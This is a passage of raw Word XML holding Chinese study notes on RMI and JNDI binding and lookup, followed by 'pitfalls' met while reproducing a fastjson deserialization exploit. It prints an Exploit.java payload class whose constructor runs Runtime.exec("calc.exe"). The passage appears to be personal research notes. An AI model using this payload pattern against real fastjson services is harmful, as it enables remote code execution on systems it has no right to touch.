        <w:t>JNDI</w:t>
      </w:r>
      <w:r w:rsidR="007D6EAF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包含</w:t>
      </w:r>
      <w:r w:rsidR="007D6EAF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RMI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0EC4CD" w14:textId="77777777" w:rsidR="007D6EAF" w:rsidRDefault="007D6EAF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BC000ED" w14:textId="3272EE78" w:rsidR="000454D2" w:rsidRDefault="000454D2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RMI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绑定的对象和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JNDI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绑定对象的区别</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540B6974" w14:textId="7E333E9E" w:rsidR="000454D2" w:rsidRDefault="000454D2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidRPr="001605E0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>纯</w:t>
      </w:r>
      <w:r w:rsidRPr="001605E0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>RMI</w:t>
      </w:r>
      <w:r w:rsidRPr="001605E0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>实现中是调用</w:t>
      </w:r>
      <w:r w:rsidRPr="001605E0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>java.rmi</w:t>
      </w:r>
      <w:r w:rsidRPr="001605E0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>包内的</w:t>
      </w:r>
      <w:r w:rsidRPr="001605E0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>bind()</w:t>
      </w:r>
      <w:r w:rsidRPr="001605E0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="001605E0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>rebind()</w:t>
      </w:r>
      <w:r w:rsidRPr="001605E0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>方法来直接绑定</w:t>
      </w:r>
      <w:r w:rsidRPr="001605E0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>RMI</w:t>
      </w:r>
      <w:r w:rsidRPr="001605E0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>注册表端口</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="001605E0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>JNDI</w:t>
      </w:r>
      <w:r w:rsidRPr="001605E0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>设置时需要预先指定其上下文环境如指定为</w:t>
      </w:r>
      <w:r w:rsidRPr="001605E0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>RMI</w:t>
      </w:r>
      <w:r w:rsidRPr="001605E0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>服务，最后再调用</w:t>
      </w:r>
      <w:r w:rsidRPr="001605E0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>javax.naming.InitialContext.bind()</w:t>
      </w:r>
      <w:r w:rsidRPr="001605E0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>来将指定对象绑定到</w:t>
      </w:r>
      <w:r w:rsidRPr="001605E0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>RMI</w:t>
      </w:r>
      <w:r w:rsidRPr="001605E0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>注册表中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF5FBF5" w14:textId="54D96134" w:rsidR="007D6EAF" w:rsidRDefault="000454D2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="001605E0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="001605E0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>纯</w:t>
      </w:r>
      <w:r w:rsidRPr="001605E0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>RMI</w:t>
      </w:r>
      <w:r w:rsidRPr="001605E0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>实现中是调用</w:t>
      </w:r>
      <w:r w:rsidRPr="001605E0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>java.rmi</w:t>
      </w:r>
      <w:r w:rsidRPr="001605E0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>包内的</w:t>
      </w:r>
      <w:r w:rsidRPr="001605E0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>lookup()</w:t>
      </w:r>
      <w:r w:rsidRPr="001605E0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>方法来检索。</w:t>
      </w:r>
      <w:r w:rsidRPr="001605E0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>JNDI</w:t>
      </w:r>
      <w:r w:rsidRPr="001605E0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>实现的</w:t>
      </w:r>
      <w:r w:rsidRPr="001605E0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>RMI</w:t>
      </w:r>
      <w:r w:rsidRPr="001605E0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>客户端查询是调用</w:t>
      </w:r>
      <w:r w:rsidRPr="001605E0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>javax.naming.InitialContext.lookup()</w:t>
      </w:r>
      <w:r w:rsidRPr="001605E0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>方法来检索</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60ED750A" w14:textId="77777777" w:rsidR="006D216B" w:rsidRPr="00732AE6" w:rsidRDefault="006D216B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54651CEE" w14:textId="77777777" w:rsidR="006655D4" w:rsidRDefault="006655D4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29A76C05" w14:textId="24CEFD5B" w:rsidR="008440DB" w:rsidRDefault="00275181" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>复现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fastjson</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实操坑点</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EE2BDC" w14:textId="37AC51F2" w:rsidR="008440DB" w:rsidRDefault="00275181" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码块未执行成功，构造函数执行成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2408D88B" w14:textId="3A133D8C" w:rsidR="00275181" w:rsidRDefault="00C87E5C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Exploit</w:t>
      </w:r>
      <w:r>
        <w:t>.java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DA4503" w14:textId="0F2CEC65" w:rsidR="00555E74" w:rsidRDefault="00555E74" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="292A2F"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>java.io.BufferedReader;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>java.io.IOException;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>java.io.InputStream;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>java.io.InputStreamReader;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">public class </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Exploit{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">public </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">throws </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Exception {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        Process p = Runtime.getRuntime().exec(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">new </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>String[]{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FC6A5D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"calc.exe"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>});</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        InputStream is = p.getInputStream();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        BufferedReader reader = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">new </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>BufferedReader(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">new </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>InputStreamReader(is));</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        String line;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>while</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">((line = reader.readLine()) != </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            System.out.println(line);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        p.waitFor();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        is.close();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        reader.close();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        p.destroy();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6C7986"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>//    static  {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6C7986"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>//        try {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
